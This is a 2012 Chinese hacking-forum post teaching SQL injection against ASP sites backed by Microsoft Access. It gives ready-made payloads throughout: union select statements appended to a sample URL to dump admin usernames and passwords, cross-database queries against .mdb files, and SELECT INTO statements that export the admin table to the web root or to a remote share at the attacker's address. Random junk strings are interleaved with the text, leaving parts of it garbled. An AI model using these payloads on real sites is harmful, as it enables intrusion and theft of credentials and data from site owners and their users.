找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2178|回复: 0
打印 上一主题 下一主题

Access高级注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:20:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
--------------------------------------------------------------+ x  v% u" ]3 C
union查询法
3 @  x$ I( n" D4 i0 s# e5 e- \首先要说的就是查询办法,一般的查询办法就是
9 p% |9 o* }, E! K% D8 v$ T9 M% [( U$ c& q  n7 t8 n7 ^, ]
程序代码
, z; G& ]6 K9 S; l% e3 w* |" L3 Aand 1=(select count(*) from admin where left(id,1)='1')
2 b$ @& O. ~) ^# |& @
6 D0 i4 P0 A- S% m这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.$ C; [1 P# d& n6 y5 l0 j
所以这个时候,union select横空出现.别以为只能在PHP里用哦...
6 n7 E- t; N( M, D/ v! [+ a' F" A9 @譬如你有一个ACCESS点:
# @, S5 [0 T. m2 x, h程序代码6 M; n/ h, U1 V6 ~
http://bbs.tian6.com/xiaoyang.asp?coder=1& L4 X/ q9 Z' _2 M" r" r

* D$ D1 s* G! p  T知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
; f1 p9 i3 v- e9 ^* F" K; q; g; \+ t然后我们直接来:
* b+ n, G, i' x- N程序代码
% W9 P! @4 y, k3 `7 bhttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]" v" j- H* v" [& I5 d, C

* x# @" e' A: X9 F, q, Y这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
7 f  |$ D" g( U9 l; M3 G9 \
! H( ~$ [  T6 y& G- Q
$ x5 v5 Q9 k) j. R# ]/ ~
1 U2 |! \, Q  \3 {# M7 \---------------------------------------------------------------
8 m8 ^& z4 i1 V2 ZAccess跨库查询) C% t* R6 R6 {
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.4 p7 u3 I" l7 h+ `0 I  R
跨库的查询语句:
3 ?+ [2 h' S2 O4 ]8 t! v4 p+ z) {子查询:0 I6 q& ]0 }% V5 {4 `' ^1 l
程序代码# b9 D) ^+ U5 j$ t) ^1 r
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
" `- A- U3 h$ ~% }6 s0 R- ?3 B$ S# p) e* k  a& X3 O" U! }
union查询:# Q  S$ \3 L$ N$ A0 X( V
程序代码
: M9 Y2 l$ n! O9 a- ]5 ^6 `union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
6 P, V2 P$ V  @; i8 v8 F- D( Z" A% U$ F
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:% w; R0 l0 K& b* S$ ^5 \5 d
程序代码
, H5 H( t; B1 ?5 t+ P1 ehttp://www.4ngel.net/article/46.htm
8 O3 J: B8 F3 G! r; q6 chttp://hf110.com/Article/hack/rqsl/200502/66.html& Z/ {9 |7 X+ {0 f/ H$ G
& {7 a2 Y1 x' X1 E. H
---------------------------------------------------------------: a) e4 q. h6 t2 ~) o
Access注入,导出txt,htm,html- `. i7 x) f, `6 o3 {
子查询语句:( O6 Z* S8 V* q* ~
程序代码
) s2 \% m# I- RSelect * into [test.txt] in 'd:\web\' 'text;' from admin
" k: @# _# }# Z( m( E9 r  `. S2 f  C
这样就把admin表的内容以test类型存进了d:\web里面.
: r3 I9 }) ^- `  u$ N, M9 w. o. G3 W8 UUNION查询:
$ h* k+ C' _" b3 O5 j1 }程序代码
7 G: f! L) Q6 \6 l1 ?union select * into [admin.txt] in 'c:\' 'test;' from admin! _1 `& x! I! r2 x3 j. q

' [& Y. I; |4 A! e而且这里也可以保存到本地来:1 R  r- K6 \1 v
程序代码) F, s  s/ h  M+ i3 W" r
Select * into [test.txt] in '\\yourip\share' 'text;' from admin0 U% ]! d& `. v0 K  U, s+ ^
+ U# `5 _# q$ y  E7 d( L: c9 u# V
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:! c. y/ R+ W( R( n; N
) Z$ N3 N& o: o* ~
程序代码
$ T% E" C4 K! vhttp://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7$ P" W1 J# n8 q& s1 n
! _, M, j5 g- O" e
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.3 ^7 x- P* B- o& G. z4 @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表